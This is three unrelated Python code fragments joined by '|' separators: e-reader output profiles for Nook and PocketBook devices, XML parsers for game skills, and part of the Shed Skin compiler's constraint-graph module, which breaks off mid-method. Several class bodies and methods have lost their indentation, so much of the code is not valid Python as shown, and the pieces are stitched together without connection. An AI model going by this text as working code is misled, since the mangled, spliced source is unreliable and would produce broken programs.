screen_size = (768, 1024)
comic_screen_size = (768, 1024)
dpi = 160
fbase = 16
fsizes = [12, 14, 16, 18, 20, 22, 24]
class NookOutput(OutputProfile):
author = 'John Schember'
name = 'Nook'
short_name = 'nook'
description = _('This profile is intended for the B&N Nook.')
# Screen size is a best guess
screen_size = (600, 730)
comic_screen_size = (584, 730)
dpi = 167
fbase = 16
fsizes = [12, 12, 14, 16, 18, 20, 22, 24]
class NookColorOutput(NookOutput):
name = 'Nook Color'
short_name = 'nook_color'
description = _('This profile is intended for the B&N Nook Color.')
screen_size = (600, 900)
comic_screen_size = (594, 900)
dpi = 169
class PocketBook900Output(OutputProfile):
    # Output profile for the PocketBook Pro 900 series.
    author = 'Chris Lockfort'
    name = 'PocketBook Pro 900'
    short_name = 'pocketbook_900'
    description = _('This profile is intended for the PocketBook Pro 900 series of devices.')
    dpi = 150.0
    screen_size = (810, 1180)
    # Comics get the full screen.
    comic_screen_size = screen_size
class PocketBookPro912Output(OutputProfile):
    # Output profile for the PocketBook Pro 912 series.
    author = 'Daniele Pizzolli'
    name = 'PocketBook Pro 912'
    short_name = 'pocketbook_pro_912'
    description = _('This profile is intended for the PocketBook Pro 912 series of devices.')
    # According to http://download.pocketbook-int.com/user-guides/E_Ink/912/User_Guide_PocketBook_912(EN).pdf
    dpi = 155.0
    screen_size = (825, 1200)
    # Comics get the full screen.
    comic_screen_size = screen_size
# Registry of every output profile known to the conversion pipeline.
output_profiles = [
    OutputProfile, SonyReaderOutput, SonyReader300Output, SonyReader900Output,
    SonyReaderT3Output, MSReaderOutput, MobipocketOutput, HanlinV3Output,
    HanlinV5Output, CybookG3Output, CybookOpusOutput, KindleOutput, iPadOutput,
    iPad3Output, KoboReaderOutput, TabletOutput, SamsungGalaxy,
    SonyReaderLandscapeOutput, KindleDXOutput, IlliadOutput, NookHD,
    IRexDR1000Output, IRexDR800Output, JetBook5Output, NookOutput,
    NookColorOutput, PocketBook900Output,
    PocketBookPro912Output, GenericEink, GenericEinkLarge, GenericEinkHD,
    KindleFireOutput, KindlePaperWhiteOutput, KindleVoyageOutput,
    KindlePaperWhite3Output
]

# Sort case-insensitively by display name.  Use the key= parameter instead
# of the Python-2-only cmp= (cmp= and the cmp() builtin were removed in
# Python 3; key= is available since 2.4 and compares each name only once).
output_profiles.sort(key=lambda x: x.name.lower())
|
class MasteryAbility(object):
    """A skill mastery ability parsed from an XML element."""

    @staticmethod
    def build_from_xml(elem):
        """Create a MasteryAbility from *elem* (needs a 'rank' attribute;
        'rule' is optional and defaults to None)."""
        ability = MasteryAbility()
        ability.rank = int(elem.attrib['rank'])
        ability.rule = elem.attrib.get('rule')
        ability.desc = elem.text
        return ability
class SkillCateg(object):
    """A skill category (id plus display name) parsed from an XML element."""

    @staticmethod
    def build_from_xml(elem):
        categ = SkillCateg()
        categ.id = elem.attrib['id']
        categ.name = elem.text
        return categ

    def __str__(self):
        return self.name

    def __unicode__(self):
        return self.name

    def __eq__(self, other):
        # A falsy comparand (e.g. None) short-circuits and is returned
        # as-is, mirroring the `other and other.id == self.id` idiom.
        if not other:
            return other
        return other.id == self.id

    def __ne__(self, other):
        return not self.__eq__(other)

    def __hash__(self):
        # Categories hash by id, consistent with __eq__.
        return hash(self.id)
class Skill(object):
    """A skill parsed from an XML element with name/id/trait/type
    attributes and optional Tags / MasteryAbilities containers."""

    @staticmethod
    def build_from_xml(elem):
        f = Skill()
        f.name = elem.attrib['name']
        f.id = elem.attrib['id']
        f.trait = elem.attrib['trait']
        f.type = elem.attrib['type']
        # The skill's own type is always the first tag.
        f.tags = [f.type]
        # Bugfix: test `is not None` rather than truthiness.  An
        # ElementTree Element with no children is falsy, so the original
        # `if elem.find('Tags'):` skipped an existing-but-empty container
        # and triggers a deprecation warning in modern ElementTree.
        tags = elem.find('Tags')
        if tags is not None:
            for se in tags.iter():
                if se.tag == 'Tag':
                    f.tags.append(se.text)
        f.mastery_abilities = []
        masteries = elem.find('MasteryAbilities')
        if masteries is not None:
            for se in masteries.iter():
                if se.tag == 'MasteryAbility':
                    f.mastery_abilities.append(MasteryAbility.build_from_xml(se))
        return f

    def __str__(self):
        # Fall back to the id when the name is empty.
        return self.name or self.id

    def __unicode__(self):
        return self.name

    def __eq__(self, obj):
        return obj and obj.id == self.id

    def __ne__(self, obj):
        return not self.__eq__(obj)

    def __hash__(self):
        return self.id.__hash__()
|
'''
*** SHED SKIN Python-to-C++ Compiler ***
Copyright 2005-2013 Mark Dufour; License GNU GPL version 3 (See LICENSE)
graph.py: build constraint graph used in dataflow analysis
constraint graph: graph along which possible types 'flow' during an 'abstract execution' of a program (a dataflow analysis). consider the assignment statement 'a = b'. it follows that the set of possible types of b is smaller than or equal to that of a (a constraint). we can determine possible types of a, by 'flowing' the types from b to a, in other words, along the constraint.
constraint graph nodes are stored in gx.cnode, and the set of types for each node in gx.types. nodes are identified by an AST Node, and two integers. the integers are used in infer.py to duplicate parts of the constraint graph along two dimensions. in the initial constraint graph, these integers are always 0.
class ModuleVisitor: inherits visitor pattern from compiler.visitor.ASTVisitor, to recursively generate constraints for each syntactical Python construct. for example, the visitFor method is called in case of a for-loop. temporary variables are introduced in many places, to enable translation to a lower-level language.
parse_module(): locate module by name (e.g. 'os.path'), and use ModuleVisitor if not cached
'''
import copy
import os
import re
import sys
from compiler.ast import Const, AssTuple, AssList, From, Add, ListCompFor, \
UnaryAdd, Import, Bitand, Stmt, Assign, FloorDiv, Not, Mod, AssAttr, \
Keyword, GenExpr, LeftShift, AssName, Div, Or, Lambda, And, CallFunc, \
Global, Slice, RightShift, Sub, Getattr, Dict, Ellipsis, Mul, \
Subscript, Function as FunctionNode, Return, Power, Bitxor, Class as ClassNode, Name, List, \
Discard, Sliceobj, Tuple, Pass, UnarySub, Bitor, ListComp, TryExcept, With
from compiler.visitor import ASTVisitor
from error import error
from infer import inode, in_out, CNode, default_var, register_temp_var
from python import StaticClass, lookup_func, Function, is_zip2, \
lookup_class, is_method, is_literal, is_enum, lookup_var, assign_rec, \
Class, is_property_setter, is_fastfor, aug_msg, is_isinstance, \
Module, def_class, parse_file, find_module
# The currently active ModuleVisitor; most helpers in this file read it
# through getmv() instead of threading it as a parameter.
_mv = None


def setmv(mv):
    """Install *mv* as the active ModuleVisitor and return it."""
    global _mv
    _mv = mv
    return mv


def getmv():
    """Return the currently active ModuleVisitor (set via setmv)."""
    return _mv
# Marker subclasses of Getattr: synthesized attribute-access nodes are
# given one of these types so later passes can tell them apart from
# attribute accesses that were present in the user's source.
class FakeGetattr3(Getattr):
    pass


class FakeGetattr2(Getattr):
    pass


class FakeGetattr(Getattr):
    pass  # XXX ugly
def check_redef(gx, node, s=None, onlybuiltins=False):  # XXX to modvisitor, rewrite
    """Abort with an error if *node* (or name *s*) redefines a function or
    class already known to the active ModuleVisitor.  Builtin modules are
    exempt; with *onlybuiltins* only the external tables are checked."""
    if getmv().module.builtin:
        return
    tables = [getmv().ext_classes, getmv().ext_funcs]
    if not onlybuiltins:
        tables += [getmv().classes, getmv().funcs]
    name = s if s is not None else node.name
    for table in tables:
        if name in table:
            error("function/class redefinition is not supported", gx, node, mv=getmv())
def inherit_rec(gx, original, copy, mv):
    """Record, recursively, that AST node *copy* is an inherited duplicate
    of *original* (and likewise for every pair of their children)."""
    gx.inheritance_relations.setdefault(original, []).append(copy)
    gx.inherited.add(copy)
    gx.parent_nodes[copy] = original
    for orig_child, copy_child in zip(original.getChildNodes(), copy.getChildNodes()):
        inherit_rec(gx, orig_child, copy_child, mv)
def register_node(node, func):
    """Remember that *node* was created while processing *func*; a falsy
    *func* (module scope) makes this a no-op."""
    if not func:
        return
    func.registered.append(node)
def slice_nums(nodes):
    """Encode slice components for a fake slice call: a Const bitmask (bit i
    set when component i was given) followed by the components, with missing
    ones replaced by Const(0)."""
    mask = 0
    encoded = []
    for pos, part in enumerate(nodes):
        if part and not (isinstance(part, Const) and part.value is None):
            encoded.append(part)
            mask |= (1 << pos)
        else:
            encoded.append(Const(0))
    return [Const(mask)] + encoded
class ModuleVisitor(ASTVisitor):
    """Generate dataflow constraints for one module by recursively
    visiting its AST (compiler.visitor pattern); temporary variables are
    introduced where needed for the lower-level translation."""
    def __init__(self, module, gx):
        ASTVisitor.__init__(self)
        self.module = module
        self.gx = gx  # global analysis state shared across modules
        self.classes = {}
        self.funcs = {}
        self.globals = {}
        self.exc_names = {}
        self.current_with_vars = []
        self.lambdas = {}
        self.imports = {}
        self.fake_imports = {}
        # names pulled in from other modules (e.g. via 'from x import *')
        self.ext_classes = {}
        self.ext_funcs = {}
        self.lambdaname = {}
        self.lwrapper = {}
        self.tempcount = self.gx.tempcount
        self.callfuncs = []
        self.for_in_iters = []
        self.listcomps = []
        self.defaults = {}
        self.importnodes = []
    def dispatch(self, node, *args):
        """Visit *node* unless a CNode already exists for it (avoids
        re-visiting shared/duplicated AST nodes)."""
        if (node, 0, 0) not in self.gx.cnode:
            ASTVisitor.dispatch(self, node, *args)
    def fake_func(self, node, objexpr, attrname, args, func):
        """Model an operation as the synthetic call objexpr.attrname(args)
        and flow its result into the CNode for *node*; returns the fake
        CallFunc node."""
        if (node, 0, 0) in self.gx.cnode:  # XXX
            newnode = self.gx.cnode[node, 0, 0]
        else:
            newnode = CNode(self.gx, node, parent=func, mv=getmv())
            self.gx.types[newnode] = set()
        fakefunc = CallFunc(Getattr(objexpr, attrname), args)
        fakefunc.lineno = objexpr.lineno
        self.visit(fakefunc, func)
        self.add_constraint((inode(self.gx, fakefunc), newnode), func)
        inode(self.gx, objexpr).fakefunc = fakefunc
        return fakefunc
# simple heuristic for initial list split: count nesting depth, first constant child type
def list_type(self, node):
count = 0
child = node
while isinstance(child, (List, ListComp)):
if not child.getChildNodes():
return None
child = child.getChildNodes()[0]
count += 1
if isinstance(child, (UnarySub, UnaryAdd)):
child = child.expr
if isinstance(child, CallFunc) and isinstance(child.node, Name):
map = {'int': int, 'str': str, 'float': float}
if child.node.name in ('range'): # ,'xrange'):
count, child = count + 1, int
elif child.node.name in map:
child = map[child.node.name]
elif child.node.name in (cl.ident for cl in self.gx.allclasses) or child.node.name in getmv().classes: # XXX getmv().classes
child = child.node.name
else:
if count == 1:
return None
child = None
elif isinstance(child, Const):
child = type(child.value)
elif isinstance(child, Name) and child.name in ('True', 'False'):
child = bool
elif isinstance(child, Tuple):
child = tuple
elif isinstance(child, Dict):
child = dict
else:
if count == 1:
return None
child = None
self.gx.list_types.setdefault((count, child), len(self.gx.list_types) + 2)
# print 'listtype', node, self.gx.list_types[count, child]
return self.gx.list_types[count, child]
    def instance(self, node, cl, func=None):
        """Register *node* as constructing an instance of class *cl*."""
        if (node, 0, 0) in self.gx.cnode:  # XXX to create_node() func
            newnode = self.gx.cnode[node, 0, 0]
        else:
            newnode = CNode(self.gx, node, parent=func, mv=getmv())
        newnode.constructor = True
        if cl.ident in ['int_', 'float_', 'str_', 'none', 'class_', 'bool_']:
            self.gx.types[newnode] = set([(cl, cl.dcpa - 1)])
        else:
            if cl.ident == 'list' and self.list_type(node):
                # use the heuristic list-split id as the duplication index
                self.gx.types[newnode] = set([(cl, self.list_type(node))])
            else:
                self.gx.types[newnode] = set([(cl, cl.dcpa)])
    def constructor(self, node, classname, func):
        """Model a container literal (list/tuple/tuple2/dict/...) as a
        construction of *classname*, flowing children into its content
        variables ('unit', and 'first'/'second' or 'value')."""
        cl = def_class(self.gx, classname)
        self.instance(node, cl, func)
        default_var(self.gx, 'unit', cl)
        if classname in ['list', 'tuple'] and not node.nodes:
            self.gx.empty_constructors.add(node)  # ifa disables those that flow to instance variable assignments
        # --- internally flow binary tuples
        if cl.ident == 'tuple2':
            default_var(self.gx, 'first', cl)
            default_var(self.gx, 'second', cl)
            elem0, elem1 = node.nodes
            self.visit(elem0, func)
            self.visit(elem1, func)
            self.add_dynamic_constraint(node, elem0, 'unit', func)
            self.add_dynamic_constraint(node, elem1, 'unit', func)
            self.add_dynamic_constraint(node, elem0, 'first', func)
            self.add_dynamic_constraint(node, elem1, 'second', func)
            return
        # --- add dynamic children constraints for other types
        if classname == 'dict':  # XXX filter children
            default_var(self.gx, 'unit', cl)
            default_var(self.gx, 'value', cl)
            for child in node.getChildNodes():
                self.visit(child, func)
            for (key, value) in node.items:  # XXX filter
                self.add_dynamic_constraint(node, key, 'unit', func)
                self.add_dynamic_constraint(node, value, 'value', func)
        else:
            for child in node.nodes:
                self.visit(child, func)
            for child in self.filter_redundant_children(node):
                self.add_dynamic_constraint(node, child, 'unit', func)
    # --- for compound list/tuple/dict constructors, we only consider a single child node for each subtype
    def filter_redundant_children(self, node):
        """Keep one representative child per inferred element type; children
        whose type cannot be determined (None) are always kept."""
        done = set()
        nonred = []
        for child in node.nodes:
            type = self.child_type_rec(child)
            if not type or not type in done:
                done.add(type)
                nonred.append(child)
        return nonred
    # --- determine single constructor child node type, used by the above
    def child_type_rec(self, node):
        """Return a hashable type signature for constructor child *node*,
        or None when the type is mixed or unknown."""
        if isinstance(node, (UnarySub, UnaryAdd)):
            node = node.expr
        if isinstance(node, (List, Tuple)):
            if isinstance(node, List):
                cl = def_class(self.gx, 'list')
            elif len(node.nodes) == 2:
                cl = def_class(self.gx, 'tuple2')
            else:
                cl = def_class(self.gx, 'tuple')
            merged = set()
            for child in node.nodes:
                merged.add(self.child_type_rec(child))
            # homogeneous container: signature is (container class, element sig)
            if len(merged) == 1:
                return (cl, merged.pop())
        elif isinstance(node, Const):
            return (list(inode(self.gx, node).types())[0][0],)
    # --- add dynamic constraint for constructor argument, e.g. '[expr]' becomes [].__setattr__('unit', expr)
    def add_dynamic_constraint(self, parent, child, varname, func):
        # print 'dynamic constr', child, parent
        self.gx.assign_target[child] = parent
        cu = Const(varname)
        self.visit(cu, func)
        fakefunc = CallFunc(FakeGetattr2(parent, '__setattr__'), [cu, child])
        self.visit(fakefunc, func)
        fakechildnode = CNode(self.gx, (child, varname), parent=func, mv=getmv())  # create separate 'fake' CNode per child, so we can have multiple 'callfuncs'
        self.gx.types[fakechildnode] = set()
        self.add_constraint((inode(self.gx, parent), fakechildnode), func)  # add constraint from parent to fake child node. if parent changes, all fake child nodes change, and the callfunc for each child node is triggered
        fakechildnode.callfuncs.append(fakefunc)
    # --- add regular constraint to function
    def add_constraint(self, constraint, func):
        """Add a (source, target) dataflow edge, attributing it to the
        nearest enclosing non-listcomp function."""
        in_out(constraint[0], constraint[1])
        self.gx.constraints.add(constraint)
        while isinstance(func, Function) and func.listcomp:
            func = func.parent  # XXX
        if isinstance(func, Function):
            func.constraints.add(constraint)
    def struct_unpack(self, rvalue, func):
        """Return True when *rvalue* looks like a struct.unpack(...) call
        (either via the struct module or an imported bare 'unpack')."""
        if isinstance(rvalue, CallFunc):
            if isinstance(rvalue.node, Getattr) and isinstance(rvalue.node.expr, Name) and rvalue.node.expr.name == 'struct' and rvalue.node.attrname == 'unpack' and lookup_var('struct', func, mv=self).imported:  # XXX imported from where?
                return True
            elif isinstance(rvalue.node, Name) and rvalue.node.name == 'unpack' and 'unpack' in self.ext_funcs and not lookup_var('unpack', func, mv=self):  # XXX imported from where?
                return True
    def struct_info(self, node, func):
        """Parse a struct format string (constant, or a variable with a
        single constant assignment) into a list of
        (ordering, format char, type name, count) tuples."""
        if isinstance(node, Name):
            var = lookup_var(node.name, func, mv=self)  # XXX fwd ref?
            if not var or len(var.const_assign) != 1:
                error('non-constant format string', self.gx, node, mv=self)
            error('assuming constant format string', self.gx, node, mv=self, warning=True)
            fmt = var.const_assign[0].value
        elif isinstance(node, Const):
            fmt = node.value
        else:
            error('non-constant format string', self.gx, node, mv=self)
        # each two-character string is a (format char, type code) pair
        char_type = dict(['xx', 'cs', 'bi', 'Bi', '?b', 'hi', 'Hi', 'ii', 'Ii', 'li', 'Li', 'qi', 'Qi', 'ff', 'df', 'ss', 'ps'])
        ordering = '@'
        if fmt and fmt[0] in '@<>!=':
            ordering, fmt = fmt[0], fmt[1:]
        result = []
        digits = ''
        for i, c in enumerate(fmt):
            if c.isdigit():
                digits += c
            elif c in char_type:
                rtype = {'i': 'int', 's': 'str', 'b': 'bool', 'f': 'float', 'x': 'pad'}[char_type[c]]
                if rtype == 'str' and c != 'c':
                    # for 's'/'p' the count is a string length, not a repeat
                    result.append((ordering, c, 'str', int(digits or '1')))
                elif digits == '0':
                    result.append((ordering, c, rtype, 0))
                else:
                    result.extend(int(digits or '1') * [(ordering, c, rtype, 1)])
                digits = ''
            else:
                error('bad or unsupported char in struct format: ' + repr(c), self.gx, node, mv=self)
                digits = ''
        return result
    def struct_faketuple(self, info):
        """Build a fake result Tuple for struct.unpack from struct_info()
        output, using representative constants per element type."""
        result = []
        for o, c, t, d in info:
            # zero-count fields contribute nothing, except 's' (empty string)
            if d != 0 or c == 's':
                if t == 'int':
                    result.append(Const(1))
                elif t == 'str':
                    result.append(Const(''))
                elif t == 'float':
                    result.append(Const(1.0))
                elif t == 'bool':
                    result.append(Name('True'))
        return Tuple(result)
    def visitExec(self, node, func=None):
        # 'exec' is rejected outright.
        error("'exec' is not supported", self.gx, node, mv=getmv())
    def visitGenExpr(self, node, func=None):
        """Model a generator expression as an equivalent list comprehension
        and flow that comprehension's type into this node."""
        newnode = CNode(self.gx, node, parent=func, mv=getmv())
        self.gx.types[newnode] = set()
        lc = ListComp(node.code.expr, [ListCompFor(qual.assign, qual.iter, qual.ifs, qual.lineno) for qual in node.code.quals], lineno=node.lineno)
        register_node(lc, func)
        self.gx.genexp_to_lc[node] = lc
        self.visit(lc, func)
        self.add_constraint((inode(self.gx, lc), newnode), func)
    def visitStmt(self, node, func=None):
        """Visit a statement list, collecting runs of bare string constants
        as comments attached to the following statement."""
        comments = []
        for b in node.nodes:
            if isinstance(b, Discard):
                self.bool_test_add(b.expr)
            if isinstance(b, Discard) and isinstance(b.expr, Const) and type(b.expr.value) == str:
                comments.append(b.expr.value)
            elif comments:
                self.gx.comments[b] = comments
                comments = []
            self.visit(b, func)
    def visitModule(self, node):
        """Process a whole module: bootstrap builtins, add the implicit
        'from builtin import *', visit children, then expand inheritance
        by duplicating inherited method ASTs into each subclass."""
        # --- bootstrap built-in classes
        if self.module.ident == 'builtin':
            for dummy in self.gx.builtins:
                self.visit(ClassNode(dummy, [], None, Pass()))
        if self.module.ident != 'builtin':
            n = From('builtin', [('*', None)], None)  # Python2.5+
            getmv().importnodes.append(n)
            self.visit(n)
        # --- __name__
        if self.module.ident != 'builtin':
            namevar = default_var(self.gx, '__name__', None, mv=getmv())
            self.gx.types[inode(self.gx, namevar)] = set([(def_class(self.gx, 'str_'), 0)])
        self.forward_references(node)
        # --- visit children
        for child in node.getChildNodes():
            if isinstance(child, Stmt):
                getmv().importnodes.extend(n for n in child.nodes if isinstance(n, (Import, From)))
            self.visit(child, None)
        # --- register classes
        for cl in getmv().classes.values():
            self.gx.allclasses.add(cl)
        # --- inheritance expansion
        # determine base classes
        for cl in self.classes.values():
            for base in cl.node.bases:
                if not (isinstance(base, Name) and base.name == 'object'):
                    ancestor = lookup_class(base, getmv())
                    cl.bases.append(ancestor)
                    ancestor.children.append(cl)
        # for each base class, duplicate methods
        for cl in self.classes.values():
            for ancestor in cl.ancestors_upto(None)[1:]:
                cl.staticmethods.extend(ancestor.staticmethods)
                cl.properties.update(ancestor.properties)
                for func in ancestor.funcs.values():
                    if not func.node or func.inherited:
                        continue
                    ident = func.ident
                    if ident in cl.funcs:
                        # name clash with the subclass: mangle the stored name
                        ident += ancestor.ident + '__'
                    # deep-copy AST function nodes
                    func_copy = copy.deepcopy(func.node)
                    inherit_rec(self.gx, func.node, func_copy, func.mv)
                    tempmv, mv = getmv(), func.mv
                    setmv(mv)
                    self.visitFunction(func_copy, cl, inherited_from=ancestor)
                    mv = tempmv
                    setmv(mv)
                    # maintain relation with original
                    self.gx.inheritance_relations.setdefault(func, []).append(cl.funcs[ident])
                    cl.funcs[ident].inherited = func.node
                    cl.funcs[ident].inherited_from = func
                    func_copy.name = ident
                    if ident == func.ident:
                        cl.funcs[ident + ancestor.ident + '__'] = cl.funcs[ident]
def stmt_nodes(self, node, cl):
result = []
for child in node.getChildNodes():
if isinstance(child, Stmt):
for n in child.nodes:
if isinstance(n, cl):
result.append(n)
return result
    def forward_references(self, node):
        """Pre-register all module-level classes, methods, functions and
        global assignments so later visits can resolve forward references."""
        getmv().classnodes = []
        # classes
        for n in self.stmt_nodes(node, ClassNode):
            check_redef(self.gx, n)
            getmv().classnodes.append(n)
            newclass = Class(self.gx, n, getmv())
            self.classes[n.name] = newclass
            getmv().classes[n.name] = newclass
            newclass.module = self.module
            newclass.parent = StaticClass(newclass, getmv())
            # methods
            for m in self.stmt_nodes(n, FunctionNode):
                if hasattr(m, 'decorators') and m.decorators and [dec for dec in m.decorators if is_property_setter(dec)]:
                    m.name = m.name + '__setter__'
                if m.name in newclass.funcs:  # and func.ident not in ['__getattr__', '__setattr__']: # XXX
                    error("function/class redefinition is not allowed", self.gx, m, mv=getmv())
                func = Function(self.gx, m, newclass, mv=getmv())
                newclass.funcs[func.ident] = func
                self.set_default_vars(m, func)
        # functions
        getmv().funcnodes = []
        for n in self.stmt_nodes(node, FunctionNode):
            check_redef(self.gx, n)
            getmv().funcnodes.append(n)
            func = getmv().funcs[n.name] = Function(self.gx, n, mv=getmv())
            self.set_default_vars(n, func)
        # global variables XXX visitGlobal
        for assname in self.local_assignments(node, global_=True):
            default_var(self.gx, assname.name, None, mv=getmv())
    def set_default_vars(self, node, func):
        """Pre-create a local variable on *func* for every name assigned in
        *node* that is not declared 'global'."""
        globals = set(self.get_globals(node))
        for assname in self.local_assignments(node):
            if assname.name not in globals:
                default_var(self.gx, assname.name, func)
def get_globals(self, node):
if isinstance(node, Global):
result = node.names
else:
result = []
for child in node.getChildNodes():
result.extend(self.get_globals(child))
return result
    def local_assignments(self, node, global_=False):
        """Collect AssName nodes assigned under *node*.  With *global_*,
        stop at class/function boundaries (module-level names only);
        comprehension scopes are always skipped."""
        if global_ and isinstance(node, (ClassNode, FunctionNode)):
            return []
        elif isinstance(node, (ListComp, GenExpr)):
            return []
        elif isinstance(node, AssName):
            result = [node]
        else:
            # Try-Excepts introduce a new small scope with the exception name,
            # so we skip it here.
            if isinstance(node, TryExcept):
                children = list(node.body.getChildNodes())
                for handler in node.handlers:
                    children.extend(handler[2].getChildNodes())
                if node.else_:
                    children.extend(node.else_.getChildNodes())
            elif isinstance(node, With):
                children = node.body.getChildNodes()
            else:
                children = node.getChildNodes()
            result = []
            for child in children:
                result.extend(self.local_assignments(child, global_))
        return result
    def visitImport(self, node, func=None):
        """Handle 'import a[.b] [as c]'; only top-of-file imports allowed."""
        if not node in getmv().importnodes:
            error("please place all imports (no 'try:' etc) at the top of the file", self.gx, node, mv=getmv())
        for (name, pseudonym) in node.names:
            if pseudonym:
                # --- import a.b as c: don't import a
                self.import_module(name, pseudonym, node, False)
            else:
                self.import_modules(name, node, False)
    def import_modules(self, name, node, fake):
        """Import every prefix of a dotted module path; returns the final
        (deepest) module."""
        # --- import a.b.c: import a, then a.b, then a.b.c
        split = name.split('.')
        module = getmv().module
        for i in range(len(split)):
            subname = '.'.join(split[:i + 1])
            parent = module
            module = self.import_module(subname, subname, node, fake)
            if module.ident not in parent.mv.imports:  # XXX
                if not fake:
                    parent.mv.imports[module.ident] = module
        return module
    def import_module(self, name, pseudonym, node, fake):
        """Analyze module *name* and (unless *fake*) bind it to an imported
        variable named *pseudonym*."""
        module = self.analyze_module(name, pseudonym, node, fake)
        if not fake:
            var = default_var(self.gx, pseudonym or name, None, mv=getmv())
            var.imported = True
            self.gx.types[inode(self.gx, var)] = set([(module, 0)])
        return module
    def visitFrom(self, node, parent=None):
        """Handle 'from module import ...' (including '*'); only
        top-of-file, non-relative imports are allowed."""
        if not node in getmv().importnodes:  # XXX use (func, node) as parent..
            error("please place all imports (no 'try:' etc) at the top of the file", self.gx, node, mv=getmv())
        if hasattr(node, 'level') and node.level:
            error("relative imports are not supported", self.gx, node, mv=getmv())
        if node.modname == '__future__':
            for name, _ in node.names:
                if name not in ['with_statement', 'print_function']:
                    error("future '%s' is not yet supported" % name, self.gx, node, mv=getmv())
            return
        module = self.import_modules(node.modname, node, True)
        self.gx.from_module[node] = module
        for name, pseudonym in node.names:
            if name == '*':
                # pull in the module's functions, classes, imports and globals
                self.ext_funcs.update(module.mv.funcs)
                self.ext_classes.update(module.mv.classes)
                for import_name, import_module in module.mv.imports.items():
                    var = default_var(self.gx, import_name, None, mv=getmv())  # XXX merge
                    var.imported = True
                    self.gx.types[inode(self.gx, var)] = set([(import_module, 0)])
                    self.imports[import_name] = import_module
                for name, extvar in module.mv.globals.items():
                    if not extvar.imported and not name in ['__name__']:
                        var = default_var(self.gx, name, None, mv=getmv())  # XXX merge
                        var.imported = True
                        self.add_constraint((inode(self.gx, extvar), inode(self.gx, var)), None)
                continue
            path = module.path
            pseudonym = pseudonym or name
            if name in module.mv.funcs:
                self.ext_funcs[pseudonym] = module.mv.funcs[name]
            elif name in module.mv.classes:
                self.ext_classes[pseudonym] = module.mv.classes[name]
            elif name in module.mv.globals and not module.mv.globals[name].imported:  # XXX
                extvar = module.mv.globals[name]
                var = default_var(self.gx, pseudonym, None, mv=getmv())
                var.imported = True
                self.add_constraint((inode(self.gx, extvar), inode(self.gx, var)), None)
            elif os.path.isfile(os.path.join(path, name + '.py')) or \
                    os.path.isfile(os.path.join(path, name, '__init__.py')):
                # importing a submodule of a package
                modname = '.'.join(module.name_list + [name])
                self.import_module(modname, name, node, False)
            else:
                error("no identifier '%s' in module '%s'" % (name, node.modname), self.gx, node, mv=getmv())
def analyze_module(self, name, pseud, node, fake):
module = parse_module(name, self.gx, getmv().module, node)
if not fake:
self.imports[pseud] = module
else:
self.fake_imports[pseud] = module
return module
    def visitFunction(self, node, parent=None, is_lambda=False, inherited_from=None):
        """Build constraints for a function/method definition: decorators,
        formals (incl. tuple unpacking), defaults, the body, an implicit
        'return None', and registration on the enclosing class/module."""
        if not getmv().module.builtin and (node.varargs or node.kwargs):
            error('argument (un)packing is not supported', self.gx, node, mv=getmv())
        if not parent and not is_lambda and node.name in getmv().funcs:
            func = getmv().funcs[node.name]
        elif isinstance(parent, Class) and not inherited_from and node.name in parent.funcs:
            func = parent.funcs[node.name]
        else:
            func = Function(self.gx, node, parent, inherited_from, mv=getmv())
            if inherited_from:
                self.set_default_vars(node, func)
        if not is_method(func):
            if not getmv().module.builtin and not node in getmv().funcnodes and not is_lambda:
                error("non-global function '%s'" % node.name, self.gx, node, mv=getmv())
        if hasattr(node, 'decorators') and node.decorators:
            # only staticmethod / property / property-setter are supported
            for dec in node.decorators.nodes:
                if isinstance(dec, Name) and dec.name == 'staticmethod':
                    parent.staticmethods.append(node.name)
                elif isinstance(dec, Name) and dec.name == 'property':
                    parent.properties[node.name] = [node.name, None]
                elif is_property_setter(dec):
                    parent.properties[dec.expr.name][1] = node.name
                else:
                    error("unsupported type of decorator", self.gx, dec, mv=getmv())
        if parent:
            if not inherited_from and not func.ident in parent.staticmethods and (not func.formals or func.formals[0] != 'self'):
                error("formal arguments of method must start with 'self'", self.gx, node, mv=getmv())
            if not func.mv.module.builtin and func.ident in ['__new__', '__getattr__', '__setattr__', '__radd__', '__rsub__', '__rmul__', '__rdiv__', '__rtruediv__', '__rfloordiv__', '__rmod__', '__rdivmod__', '__rpow__', '__rlshift__', '__rrshift__', '__rand__', '__rxor__', '__ror__', '__iter__', '__call__', '__enter__', '__exit__', '__del__', '__copy__', '__deepcopy__']:
                error("'%s' is not supported" % func.ident, self.gx, node, warning=True, mv=getmv())
        if is_lambda:
            self.lambdas[node.name] = func
        # --- add unpacking statement for tuple formals
        func.expand_args = {}
        for i, formal in enumerate(func.formals):
            if isinstance(formal, tuple):
                # replace the tuple formal with a temp and unpack it
                tmp = self.temp_var((node, i), func)
                func.formals[i] = tmp.name
                fake_unpack = Assign([self.unpack_rec(formal)], Name(tmp.name))
                func.expand_args[tmp.name] = fake_unpack
                self.visit(fake_unpack, func)
        func.defaults = node.defaults
        for formal in func.formals:
            var = default_var(self.gx, formal, func)
            var.formal_arg = True
        # --- flow return expressions together into single node
        func.retnode = retnode = CNode(self.gx, node, parent=func, mv=getmv())
        self.gx.types[retnode] = set()
        func.yieldnode = yieldnode = CNode(self.gx, (node, 'yield'), parent=func, mv=getmv())
        self.gx.types[yieldnode] = set()
        self.visit(node.code, func)
        for i, default in enumerate(func.defaults):
            if not is_literal(default):
                self.defaults[default] = (len(self.defaults), func, i)
            self.visit(default, None)  # defaults are global
        # --- add implicit 'return None' if no return expressions
        if not func.returnexpr:
            func.fakeret = Return(Name('None'))
            self.visit(func.fakeret, func)
        # --- register function
        if isinstance(parent, Class):
            if func.ident not in parent.staticmethods:  # XXX use flag
                default_var(self.gx, 'self', func)
                if func.ident == '__init__' and '__del__' in parent.funcs:  # XXX what if no __init__
                    self.visit(CallFunc(Getattr(Name('self'), '__del__'), []), func)
                    self.gx.gc_cleanup = True
            parent.funcs[func.ident] = func
def unpack_rec(self, formal):
if isinstance(formal, str):
return AssName(formal, 'OP_ASSIGN')
else:
return AssTuple([self.unpack_rec(elem) for elem in formal])
    def visitLambda(self, node, func=None):
        """Desugar a lambda into a named fake function '__lambdaN__'."""
        lambdanr = len(self.lambdas)
        name = '__lambda%d__' % lambdanr
        fakenode = FunctionNode(None, name, node.argnames, node.defaults, node.flags, None, Return(node.code))
        self.visit(fakenode, None, True)
        f = self.lambdas[name]
        f.lambdanr = lambdanr
        self.lambdaname[node] = name
        newnode = CNode(self.gx, node, parent=func, mv=getmv())
        self.gx.types[newnode] = set([(f, 0)])
        newnode.copymetoo = True
    def visitAnd(self, node, func=None):
        # 'and' and 'or' share one implementation.
